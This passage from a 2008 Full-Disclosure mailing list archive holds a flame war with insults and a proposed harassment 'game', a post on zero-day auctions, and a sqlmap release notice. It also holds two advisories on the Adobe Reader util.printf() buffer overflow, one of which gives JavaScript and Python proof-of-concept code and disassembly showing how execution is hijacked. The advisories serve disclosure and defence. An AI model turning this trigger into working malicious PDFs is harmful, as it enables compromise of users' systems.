>>>> http://www.gnucitizen.org/blog/new-technique-to-perform-universal-w
>>>> ebsite-hijacking/
>>>>
>>>> [3] "SonicWALL Content-Filtering Universal Script Injection
Vulnerability"
>>>> http://www.zerodayinitiative.com/advisories/ZDI-08-070/
>>>>
>>>> --
>>>> Adrian "pagvac" Pastor | GNUCITIZEN gnucitizen.org
>>>>
>>>> _______________________________________________
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>



From badzmanaois at gmail.com  Tue Nov  4 09:48:55 2008
From: badzmanaois at gmail.com (Salvador III Manaois)
Date: Tue, 4 Nov 2008 17:48:55 +0800
Subject: [Full-disclosure] Odays offers
In-Reply-To: <282134E75BDEB64E943CAF38C80BDD8AD32493@PRO-EXCHANGESRV.experian.dk>
References: <bc62aa7c0811030336q5d2b34fanc5c4cf7734f22f6a@mail.gmail.com>
	<6158bb410811031123v18969527x8e0a4ac72cf18785@mail.gmail.com>
	<282134E75BDEB64E943CAF38C80BDD8AD32493@PRO-EXCHANGESRV.experian.dk>
Message-ID: <cb7d6d2e0811040148w5fbf7071j5be3d3f51a4a087@mail.gmail.com>

sell 'em at wabisabilabi.

ops, too late:

http://www.techworld.com/security/news/index.cfm?newsID=106294

...badz...
Bytes & Badz: http://badzmanaois.blogspot.com



From xploitable at gmail.com  Tue Nov  4 10:16:04 2008
From: xploitable at gmail.com (n3td3v)
Date: Tue, 4 Nov 2008 10:16:04 +0000
Subject: [Full-disclosure] Odays offers
In-Reply-To: <282134E75BDEB64E943CAF38C80BDD8AD32493@PRO-EXCHANGESRV.experian.dk>
References: <bc62aa7c0811030336q5d2b34fanc5c4cf7734f22f6a@mail.gmail.com>
	<6158bb410811031123v18969527x8e0a4ac72cf18785@mail.gmail.com>
	<282134E75BDEB64E943CAF38C80BDD8AD32493@PRO-EXCHANGESRV.experian.dk>
Message-ID: <4b6ee9310811040216t78919e8au45c5b3fee8b6e8a9@mail.gmail.com>

On Tue, Nov 4, 2008 at 9:12 AM, Anders Klixbull <akl at experian.dk> wrote:
> Fuck the vendors put them on FD
>

What do you mean 'fuck the vendors put them on fd'? what kind of
pratice are you running?

Are you trying to say everyone who posts vulnerabilities on fd has
your mind set of 'fuck the vendors'?

Are you trying to say this is a 'fuck the vendors' mailing list? If so
this isn't a very polite mailing list is it?

Please refrain from future language of this nature, as not everyone
who posts to fd has a 'fuck the vendors' mind set.

You are a very rude person not the kind of person everyone on fd
agrees with your language of 'fuck the vendors', you could put it in a
more carefully constructed manner as not to be so rude.

You are the worst kind of individual to be posting to fd with your
mind set of 'fuck the vendors'.

Trust me not everyone who posts to fd has your mentality of 'fuck the vendors'.

Does this mean you are wanting the vendors to be fucked?

You are running borderline on unethical, and this list is full of
whitehats like me who get angry when blackhats come on the list and
think they can behave in a nature thats unethical.

You should learn some manners and go wash your mouth out with soap and water.



From akl at experian.dk  Tue Nov  4 11:18:54 2008
From: akl at experian.dk (Anders Klixbull)
Date: Tue, 4 Nov 2008 12:18:54 +0100
Subject: [Full-disclosure] Odays offers
In-Reply-To: <4b6ee9310811040216t78919e8au45c5b3fee8b6e8a9@mail.gmail.com>
References: <bc62aa7c0811030336q5d2b34fanc5c4cf7734f22f6a@mail.gmail.com><6158bb410811031123v18969527x8e0a4ac72cf18785@mail.gmail.com><282134E75BDEB64E943CAF38C80BDD8AD32493@PRO-EXCHANGESRV.experian.dk>
	<4b6ee9310811040216t78919e8au45c5b3fee8b6e8a9@mail.gmail.com>
Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD32495@PRO-EXCHANGESRV.experian.dk>

Go suck a lemon bitch 

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of n3td3v
Sent: 4. november 2008 11:16
To: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Odays offers

On Tue, Nov 4, 2008 at 9:12 AM, Anders Klixbull <akl at experian.dk> wrote:
> Fuck the vendors put them on FD
>

What do you mean 'fuck the vendors put them on fd'? what kind of pratice
are you running?

Are you trying to say everyone who posts vulnerabilities on fd has your
mind set of 'fuck the vendors'?

Are you trying to say this is a 'fuck the vendors' mailing list? If so
this isn't a very polite mailing list is it?

Please refrain from future language of this nature, as not everyone who
posts to fd has a 'fuck the vendors' mind set.

You are a very rude person not the kind of person everyone on fd agrees
with your language of 'fuck the vendors', you could put it in a more
carefully constructed manner as not to be so rude.

You are the worst kind of individual to be posting to fd with your mind
set of 'fuck the vendors'.

Trust me not everyone who posts to fd has your mentality of 'fuck the
vendors'.

Does this mean you are wanting the vendors to be fucked?

You are running borderline on unethical, and this list is full of
whitehats like me who get angry when blackhats come on the list and
think they can behave in a nature thats unethical.

You should learn some manners and go wash your mouth out with soap and
water.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



From randallm at fidmail.com  Tue Nov  4 13:50:56 2008
From: randallm at fidmail.com (Big R)
Date: Tue, 4 Nov 2008 07:50:56 -0600
Subject: [Full-disclosure] apology-www.dia.mil
Message-ID: <a85ce8a70811040550s2083ee7v9d0078c9cb25e88e@mail.gmail.com>

Last week a post was given concerning www.dia.mil. I quickly brushed it off
as just someone not or thinking they were seeing something. Guess so much
dumb junk on the list lately contributed to that conclusion.

Well, I am sorry. Nice catch:

http://www.informationweek.com/news/security/government/showArticle.jhtml?articleID=211800622

-- 
been great, thanks
Big R
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081104/d87a7d57/attachment.html 

From xploitable at gmail.com  Tue Nov  4 13:57:56 2008
From: xploitable at gmail.com (n3td3v)
Date: Tue, 4 Nov 2008 13:57:56 +0000
Subject: [Full-disclosure] Odays offers
In-Reply-To: <cb7d6d2e0811040148w5fbf7071j5be3d3f51a4a087@mail.gmail.com>
References: <bc62aa7c0811030336q5d2b34fanc5c4cf7734f22f6a@mail.gmail.com>
	<6158bb410811031123v18969527x8e0a4ac72cf18785@mail.gmail.com>
	<282134E75BDEB64E943CAF38C80BDD8AD32493@PRO-EXCHANGESRV.experian.dk>
	<cb7d6d2e0811040148w5fbf7071j5be3d3f51a4a087@mail.gmail.com>
Message-ID: <4b6ee9310811040557q161e3321lc4c429275c483702@mail.gmail.com>

now maybe he should shut down his zone-h site as well and keep
whitehats happy :)

On Tue, Nov 4, 2008 at 9:48 AM, Salvador III Manaois
<badzmanaois at gmail.com> wrote:
> sell 'em at wabisabilabi.
>
> ops, too late:
>
> http://www.techworld.com/security/news/index.cfm?newsID=106294
>



From fd.leach at googlemail.com  Mon Nov  3 21:51:57 2008
From: fd.leach at googlemail.com (Some Guy Posting To Full Disclosure)
Date: Mon, 3 Nov 2008 13:51:57 -0800
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
Message-ID: <197321660811031351pdfa5371y121bebb8b8c7396e@mail.gmail.com>

It's futile trying to use the law to change things.
It will simply force people into the shadows. Which today involves
using tor and some Russian web money account.

I read a slogan from before my time, in a book: "If source is outlawed
outlaws will have source" - same applies to zero days.

Anyway I don't think it should be Illegal. I own a set of lock picks -
I don't intend to break into someone's house. And if I did I'd go to
jail (for the burglary and being equipped with picks), untill then I'm
innocent. The UKs law has an attitude like that - I like it!
Resources should go into actually preventing crimes taking place. Not
stumbling around hoping that making it awkward for criminals to get
the tools they need will make a difference.

Simon.



From remove-vuln at secunia.com  Tue Nov  4 14:01:52 2008
From: remove-vuln at secunia.com (Secunia Research)
Date: Tue, 4 Nov 2008 15:01:52 +0100
Subject: [Full-disclosure] Secunia Research: Adobe Acrobat/Reader
	"util.printf()" Buffer Overflow
Message-ID: <200811041401.mA4E1qP2024703@ca.secunia.com>

====================================================================== 

                     Secunia Research 04/11/2008

       - Adobe Acrobat/Reader "util.printf()" Buffer Overflow -

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Adobe Acrobat / Reader version 8.1.2

NOTE: Other versions may also be affected.

====================================================================== 
2) Severity 

Rating: Highly critical
Impact: System access
Where:  Remote

====================================================================== 
3) Vendor's Description of Software 

"Adobe Acrobat 8 Professional software enabled business professionals
to reliably create, combine, and control Adobe PDF documents for
easy, more secure distribution, collaboration, and data collection."

Product Link: http://www.adobe.com/products/acrobat/

====================================================================== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Adobe 
Acrobat/Reader, which can be exploited by malicious people to 
compromise a user's system.

The vulnerability is caused due to a boundary error when parsing
format strings containing a floating point specifier in the
"util.printf()" Javascript function and can be exploited to cause a
stack-based buffer overflow via a specially crafted PDF.

Successful exploitation may allow execution of arbitrary code when 
viewing a malicious PDF file.

====================================================================== 
5) Solution 

The vendor will be releasing fixes later today.

NOTE: This was supposed to be a coordinated disclosure with Adobe, but
a third party has leaked the information.

====================================================================== 
6) Time Table 

16/04/2008 - Vendor notified.
17/04/2008 - Vendor response.
09/05/2008 - Vendor informed that similar vulnerability will be fixed
             in Foxit Reader this month.
10/05/2008 - Vendor response thanking for the heads-up.
20/05/2008 - Similar vulnerability published for Foxit Reader.
22/10/2008 - Vendor provides status update.
31/10/2008 - Vendor provides another status update along with a draft
             of the upcoming security bulletin.
04/11/2008 - Public disclosure.

====================================================================== 
7) Credits 

Discovered by Dyon Balding, Secunia Research.

====================================================================== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2008-2992 for the vulnerability.

====================================================================== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below 
to see currently vacant positions:

http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/ 

====================================================================== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-14/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================



From advisories at coresecurity.com  Tue Nov  4 16:09:17 2008
From: advisories at coresecurity.com (CORE Security Technologies Advisories)
Date: Tue, 04 Nov 2008 14:09:17 -0200
Subject: [Full-disclosure] CORE-2008-0526: Adobe Reader Javascript Printf
	Buffer Overflow
Message-ID: <491073AD.1080801@coresecurity.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

      Core Security Technologies - CoreLabs Advisory
           http://www.coresecurity.com/corelabs/

      Adobe Reader Javascript Printf Buffer Overflow



1. *Advisory Information*

Title: Adobe Reader Javascript Printf Buffer Overflow
Advisory ID: CORE-2008-0526
Advisory URL:
http://www.coresecurity.com/content/adobe-reader-buffer-overflow
Date published: 2008-11-04
Date of last update: 2008-11-04
Vendors contacted: Adobe
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Buffer overflow
Remotely Exploitable: Yes (client-side)
Locally Exploitable: Yes
Bugtraq ID: 30035
CVE Name: CVE-2008-2992


3. *Vulnerability Description*

Adobe Reader is arguably the world's most ubiquitous electronic document
sharing application. The software can be used to view, search, digitally
sign, verify, print, and collaborate on Adobe PDF files, and includes
scripting functionality to allow for extended customization and
extensibility.

Adobe Reader suffers from a stack buffer overflow when parsing specially
crafted (invalid) PDF files. The vulnerability is caused due to a
boundary error when parsing format strings containing a floating point
specifier in the "util.printf()" JavaScript function. Successful
exploitation of the vulnerability requires that users open a maliciously
crafted PDF file thereby allowing attackers to gain access to vulnerable
systems and assume the privileges of a user running Acrobat Reader.
Adobe Reader version 9, which was released in June 2008, is not
vulnerable to the reported problem.


4. *Vulnerable packages*

   . Adobe Reader 8.1.2
   . Acrobat 8.1.2


5. *Non-vulnerable packages*

   . Adobe Reader 9
   . Acrobat 9
   . Adobe Reader 8.1.3
   . Acrobat 8.1.3


6. *Vendor Information, Solutions and Workarounds*

Adobe will issue a security update that addresses the vulnerable version
8.1.2 of Reader.

Alternatively, a possible workaround for this vulnerability is to
disable JavaScript in Adobe Reader and Acrobat (in the software's
Edit/Preferences menu). Disabling JavaScript will prevent the issue,
although it will also prevent many basic Acrobat and Reader workflows
from properly functioning.


7. *Credits*

The CVE-2008-2992 vulnerability was discovered by Damian Frizza from the
CORE IMPACT Exploit Writers Team at Core Security Technologies while
investigating the feasibility of exploiting a bug in Foxit Reader that
had been disclosed in May 2008. The CVE-2008-1104 vulnerability was
discovered in Foxit Reader by Dyon Balding from Secunia Research.


8. *Technical Description / Proof of Concept Code*

While investigating the feasibility of exploiting the vulnerability
previously disclosed in Foxit Reader (CVE-2008-1104) [1] we found that
Adobe Reader was affected by the same bug. After an initial examination
of the involved implementation bug, it was believed that although
present, the problem was apparently not exploitable in Adobe Reader due
to the use of two structured exception handlers in the program. The
primary difference between the Adobe and Foxit applications is the
manner in which they perform security checks, and at first glance, it
seemed as if the bug was not exploitable in Reader, since there was no
way to control the program's first exception handler.

However, upon further examination of the code, we found that another
overflow occurs before the call to the involved code is made in relation
to the previously known vulnerability. This new problem was identified
in the way vulnerable versions of Adobe Reader implement the JavaScript
util.printf() function. The function first converts the argument it
receives to a String, using only the first 16 digits of the argument and
padding the rest with a fixed value of "0" (0x30). By passing an overly
long and properly formatted command to the function it is possible to
overwrite the program's memory and control its execution flow.

A specifically crafted PDF file that embeds JavaScript code to
manipulate the program's memory allocation pattern and trigger the
vulnerability can allow an attacker to execute arbitrary code with the
privileges of a user running the Adobe Reader application.

We now present the details of the vulnerability. The original Secunia
advisory concerning Foxit Reader stated: "the vulnerability is caused
due to a boundary error when parsing format strings containing a
floating point specifier in the 'util.printf()' JavaScript function."
While researching this bug we found that the following Javascript code
triggers the bug:

/-----------

    var num = 1.2
    util.printf("%5000f",num)

- -----------/

 These two simple Javascript lines cause the byte 0x20 to be copied 5000
times on the stack. This allows to take control of the exception
handler, and also to trigger an exception when trying to write in the
section that comes after the stack.

By filling somehow the heap until the address 0x20202020, for example by
doing a heap spray from the Javascript, an exploit can be made for Foxit
Reader.

After a Proof of Concept PDF file was crafted, we tried to open it with
Adobe Reader 8.1.2. The application closed without warning, without
crash, simply closed.

By disassembling the DLL library Escript.api, we reached this code:

/-----------

    238AF9C5    PUSH EDI
    238AF9C6    PUSH 20
    238AF9C8    PUSH ESI
    238AF9C9    CALL MSVCR80.memset

- -----------/

 This is exactly the same bug, where EDI is the size to be copied,
controlled by the attacker, and ESI is the destination, pointing to a
buffer in the stack.

The program generates an exception here:

/-----------

    78144AFF   REP STOS DWORD PTR ES:[EDI]

- -----------/

 inside the code of the memset function, when trying to write in the
section that comes after the stack.

We examined the active SEH (Structured Exception Handlers), and found
that in this case (unlike the Foxit case), we have two SEH:

/-----------

    Address    SE handler
    0012EE70   EScript.238F6F95
    0012F140   20202020

- -----------/

 One has been completely overwritten by us, and the other not. The code
of the first handler is:

/-----------

    238F6F95    MOV EDX,DWORD PTR SS:[ESP+8]
    238F6F99    LEA EAX,DWORD PTR DS:[EDX+C]
    238F6F9C    MOV ECX,DWORD PTR DS:[EDX-58]
    238F6F9F    XOR ECX,EAX
    238F6FA1    CALL EScript.23806D28     Security Cookie Check 1
    238F6FA6    MOV ECX,DWORD PTR DS:[EDX+22C]
    238F6FAC    XOR ECX,EAX
    238F6FAE    CALL EScript.23806D28    Security Cookie Check 2
    238F6FB3    MOV EAX,EScript.2391B54C
    238F6FB8    JMP MSVCR80.__CxxFrameHandler3

- -----------/

 When the exception is generated, this handler takes the control and is
charged of checking two security cookies. One of them has been
overwritten, so the execution jumps directly to ExitProcess.

Until now, the difference between the two bugs is only the cookies
check. In Foxit we have the following structure on the stack:

/-----------

    Memset Buffer
    RET
    ...
    ...
    SEH
    ...
    ...

- -----------/

 Whereas in Adobe Reader we basically have:

/-----------

    SEH1              --> Security Cookie Check
    ...
    Memset Buffer
    SecurityCookie
    RET
    ...
    SEH2             --> Overwritten with 0x20202020

- -----------/

 At first sight, it seems that this bug in not exploitable, since there
is no way to control the first handler. But... looking at the code, we
found that before the vulnerable call to memset, another overflow
occurs. As a first step, the program transforms the argument received by
the function util.printf() to a String here:

/-----------

    238AF8D1   FSTP QWORD PTR SS:[ESP]
    238AF8D4   CALL DWORD PTR DS:[MSVCR80._fcvt]

- -----------/

 The function returns only the first 16 digits, and the rest is padded
with "0" (0x30). This is copied to the stack here:

/-----------

    238AF946    MOV EAX,DWORD PTR SS:[EBP-28]
    238AF949    MOV AL,BYTE PTR DS:[EAX+EDX]
    238AF94C   MOV BYTE PTR DS:[ESI+EDI],AL      # copy to the stack
    238AF94F    INC EDI
    238AF950    INC EDX
    238AF951    CMP EDX,ECX

- -----------/

 After this copy is completed, the stack has the following disposition:

/-----------

    Float To String Buffer
    ...
    ...
    SEH1      --> Overwritten with 0x30303030
    ...
    ...
    Memset Buffer
    ...
    ...
    SEH2     -->  Overwritten with 0x20202020
    ...
    ...

- -----------/

 If we call the vulnerable function with a long enough number, we can
avoid the cookies check and jump to the address 0x30303030. By
allocating memory somehow and copying our shellcode there, we can
execute arbitrary code in the context of the application.

The following Python code generates a PoC Javascript code:

/-----------

      fill = 276 * '8'
      script="""
      var num = 12999999999999999999_FILL_
      util.printf("%45000f",num)
      """
      script = script.replace('_FILL_', fill)

      print script

- -----------/

 By embedding the generated script in a PDF file, we got an 'Access
violation when executing [30303030]'.


9. *Report Timeline*

. 2008-05-27: Core Security Technologies notifies the vendor of the
vulnerability, similar to the CVE-2008-1104 vulnerability affecting
Foxit Reader.
. 2008-05-27: Vendor acknowledges notification.
. 2008-05-28: Core sends technical details of the vulnerability, and a
Javascript PoC that triggers the bug.
. 2008-05-28: Vendor confirms that they were aware of this
vulnerability. Vendor states that it will be fixed in an update, and
that the schedule for this update is still to be determined.
. 2008-05-29: Core sends some corrections to the info provided, and asks
to be updated about the progress for releasing a fixed version.
. 2008-05-30: Vendor agrees to keep Core updated on their progress.
. 2008-06-09: Core sends the advisory draft, and states that it plans to
publish the advisory on June 23rd. Core also offers the vendor to
include a vendor statement in the advisory.
. 2008-06-09: Vendor states that the issue will be solved in an update
for Adobe Reader 8.1.2, and in the next major release of Adobe Acrobat
and Reader.
. 2008-06-13: Core requests an estimated date for the release of the
next major Adobe Reader version, and expresses its concerns respect to
delaying the publication of the advisory, since it is straightforward
for a potential attacker to rediscover the vulnerability and exploit it
"in the wild", given its relation to the Foxit reader CVE-2008-1104 bug.
. 2008-06-16: Vendor responds that it expects the Adobe Reader 8.1.2
update to occur in the July timeframe.
. 2008-06-27: Core requests updated information concerning the release
dates of Adobe Reader 9 and the 8.1.2 update.
. 2008-06-28: Vendor responds that Adobe Reader 9 is scheduled for July 1st.
. 2008-07-01: Vendor states that the 8.1.2 update is tentatively
scheduled for an early fall release, and not in July as previously informed.
. 2008-07-01: Adobe Reader 9 is publicly released.
. 2008-07-01: Core communicates its intention to publish its security
advisory on July 2nd, given that there is a fixed Adobe Reader version
available, and that the vulnerability is closely related to a
vulnerability already publicly known and exploited (the Foxit reader
CVE-2008-1104 bug).
. 2008-07-01: Vendor requests Core to hold off the publication of the
advisory, because there is still no solution for Adobe Acrobat 8
customers besides paying for an upgrade to Acrobat 9.
. 2008-07-01: Core requests additional information before revising the
publication date: a list of vulnerable products and versions, a concrete
date for the release of the Acrobat and Reader 8.1.2 update, and
possible workarounds for this vulnerability.
. 2008-07-02: Vendor confirms that the vulnerable products and versions
are: Adobe Reader 8.1.2 and Acrobat 8.1.2.
. 2008-07-02: Vendor confirms that disabling JavaScript will prevent the
issue, although it will also prevent many basic Acrobat and Reader
workflows from properly functioning. Vendor commits to providing an
estimated release date for the Acrobat 8.1.2 update as soon as possible.
. 2008-07-02: Core communicates that it will reschedule the publication
of the advisory.
. 2008-07-02: Vendor states that it is working with the team to get a
more specific schedule.
. 2008-07-08: Vendor states that it is still working on expediting the fix.
. 2008-07-08: Core appreciates the updates, and asks for the CVE number
assigned to this issue.
. 2008-07-09: Vendor communicates the estimated release date of October
15th.
. 2008-07-09: Vendor states that the release of an updated Acrobat
version is still estimated for October 15th.
. 2008-09-03: Core requests updated information.
. 2008-09-03: Vendor responds that the release date is still estimated
for October 15th.
. 2008-10-03: Vendor informs that there has been a delay in the schedule
for the upcoming Reader 8.1.3 release. Its current plan of record is now
to target November 4th as the deployment date.
. 2008-10-20: Core asks for confirmation of the release date.
. 2008-10-20: Vendor responds that it is still on track to release
Reader 8.1.3 on November 4th, and that it should have a Security
Bulletin draft to review next week.
. 2008-10-29: Vendor confirms the release of Reader 8.1.3 on November 4th.
. 2008-11-04: Advisory CORE-2008-0526 is published.


10. *References*

[1] Foxit Reader "util.printf()" Buffer Overflow (CVE-2008-1104) -
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1104


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkkQc60ACgkQyNibggitWa2XmgCfQuemfRRpWnUOqIbJyR/Ioj4c
YjwAn0A6hNouqD4CJI8hmRCnMPvENPRP
=WCMf
-----END PGP SIGNATURE-----



From elazar at hushmail.com  Tue Nov  4 16:37:16 2008
From: elazar at hushmail.com (Elazar Broad)
Date: Tue, 04 Nov 2008 11:37:16 -0500
Subject: [Full-disclosure] Securing our computers?
Message-ID: <20081104163716.5DC262803B@smtp.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Beer, dry wine, single malts and the occasional shot of good Polish
potato vodka...

On Tue, 04 Nov 2008 00:17:17 -0500 Michael Boman
<michael.boman at gmail.com> wrote:
>Beer and Whiskey, unless you have a good Russian vodka - the
>Swedish
>ones ain't that good compared to the Russians.
>
>Best regards
>Michael Boman
>
>On Tue, Nov 4, 2008 at 2:38 AM, Elazar Broad <elazar at hushmail.com>
>wrote:
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>> Whats your poison of choice?
>>
>> On Mon, 03 Nov 2008 18:12:13 -0500 Michael Boman
>> <michael.boman at gmail.com> wrote:
>>>I already have a drinking game going, awarding myself a drink
>for
>>>every time n3td3v says something stupid, and every time I play
>it
>>>I
>>>run out of booze or blacks out... Dangerous stuff... If you are
>in
>>>my
>>>area we can play it together sometime...
>>>
>>>Best regards
>>>Michael Boman
>>>
>>>On Tue, Nov 4, 2008 at 12:06 AM, vulcanius <vulcanius at gmail.com>
>>>wrote:
>>>> Actually I think a new game should be created that revolves
>>>around stalking
>>>> n3td3v. Points would be awarded for the quickest response to
>>>each of his
>>>> worthless posts. At the end of the month a Stalker of the
>Month
>>>could be
>>>> selected and given a prize. Bonus points could be given out
>for
>>>the most
>>>> degrading responses. I think it could be a lot of fun.
>>>>
>>>> On Mon, Nov 3, 2008 at 4:58 PM, Ed Carp <erc at pobox.com> wrote:
>>>>>
>>>>> Jesus ... you guys need to get back on your lithium...
>>>>>
>>>>> _______________________________________________
>>>>> Full-Disclosure - We believe in it.
>>>>> Charter: http://lists.grok.org.uk/full-disclosure-
>charter.html
>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>>
>>>> _______________________________________________
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>
>>>
>>>
>>>--
>>>http://michaelboman.org - Security Blog & Wiki
>>>
>>>_______________________________________________
>>>Full-Disclosure - We believe in it.
>>>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>Hosted and sponsored by Secunia - http://secunia.com/
>> -----BEGIN PGP SIGNATURE-----
>> Charset: UTF8
>> Note: This signature can be verified at
>https://www.hushtools.com/verify
>> Version: Hush 3.0
>>
>>
>wpwEAQECAAYFAkkPp6EACgkQi04xwClgpZjskAP/a3SMEtnpaW35KeMcKTkcmdo/Z5D
>y
>>
>IEJUk9PkyTzne+6xHqJ6ZTmeD27yAUNQTIZ68QpJlK/mCtZg0nRcjovV3P5+9dn1LcQ
>3
>>
>myyVoHyuz12oReXEw872nsPfEs7DK5UuplIueTqGW5YaFMZ/4DVgjI9fCo0hp20WbvS
>8
>> 0IwZ5mc=
>> =jTLZ
>> -----END PGP SIGNATURE-----
>>
>> --
>> Find precision scales that can weigh anything. Click now!
>>
>http://tagline.hushmail.com/fc/Ioyw6h4dUuTd7dtWT7hv6q3aYswG8Qwo3mbs
>h76QpUCPJJNNuemryA/
>>
>>
>
>
>
>--
>http://michaelboman.org - Security Blog & Wiki
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkkQejwACgkQi04xwClgpZhsfgP9HIFtVvYCnAiH98dRHWDIgaNbMkEX
f7YiLnOq1ukT3o2JIRKg+dkUjHOcGjSq2r5HF7M8qnsR2qNwVtjfa3IoWMjgXNYwpXNa
C83n/H7A3FjUdr6FoLpb2PvGAa2gUFz2ERPZQZOY1KK8pWlPNEPKbZZbgfIRGM3jc3LT
6k1u/08=
=1Cyk
-----END PGP SIGNATURE-----

--
Click here to save cash and find low rates on auto loans.
http://tagline.hushmail.com/fc/Ioyw6h4ejOhn5aGxMAVXV99hi30bmWAil30Nvj48shBoA4hiNmaRjq/



From bernardo.damele at gmail.com  Tue Nov  4 16:56:09 2008
From: bernardo.damele at gmail.com (Bernardo Damele A. G.)
Date: Tue, 4 Nov 2008 16:56:09 +0000
Subject: [Full-disclosure] [Tool] sqlmap 0.6.2 released
Message-ID: <ffa432520811040856o6f9cad19y44786d14de9f1ca8@mail.gmail.com>

Hi,

I am glad to release sqlmap version 0.6.2. This is a major bug fixes release.

Introduction
============

sqlmap is an automatic SQL injection tool developed in Python. Its
goal is to detect and take advantage of SQL injection vulnerabilities
on web applications. Once it detects one or more SQL injections on the
target host, the user can choose among a variety of options to perform
an extensive back end database management system fingerprint, retrieve
DBMS session user and database, enumerate users, password hashes,
privileges, databases, dump entire or user's specific DBMS
tables/columns, run his own SQL SELECT statement, read specific files
on the file system and much more.


Changes
=======

The major bugs fixed are:

* Major bug fix to correctly dump tables entries when --stop is not specified;
* Major bug fix so that the users' privileges enumeration now works
properly also on both MySQL < 5.0 and MySQL >= 5.0;
* Major bug fix when the request is POST to also send the GET
parameters if any have been provided;
* Major bug fix to correctly update sqlmap to the latest stable
release with command line --update;
* Major bug fix so that when the expected value of a query (count
variable) is an integer and, for some reasons, its resumed value from
the session file is a string or a binary file, the query is executed
again and its new output saved to the session file;

Complete list of changes at http://sqlmap.sourceforge.net/doc/ChangeLog.


Download
========

You can download it in various formats:

* Source gzip compressed,
http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.2.tar.gz

* Source bzip2 compressed,
http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.2.tar.bz2

* Source zip compressed,
http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.2.zip

* DEB binary package,
http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.2-1_all.deb

* RPM binary package,
http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.2-1.noarch.rpm

* Portable executable for Windows that does not require the Python
interpreter to be installed on the operating system,
http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.2_exe.zip


Documentation
=============

* sqlmap user's manual: http://sqlmap.sourceforge.net/doc/README.pdf

* sqlmap developer's documentation: http://sqlmap.sourceforge.net/dev/


Happy hacking!
-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F



From announce-noreply at rpath.com  Tue Nov  4 16:01:45 2008
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Tue, 04 Nov 2008 11:01:45 -0500
Subject: [Full-disclosure] rPSA-2008-0311-1 postfix
Message-ID: <491071e9.t13onQusLrFJtF+v%announce-noreply@rpath.com>

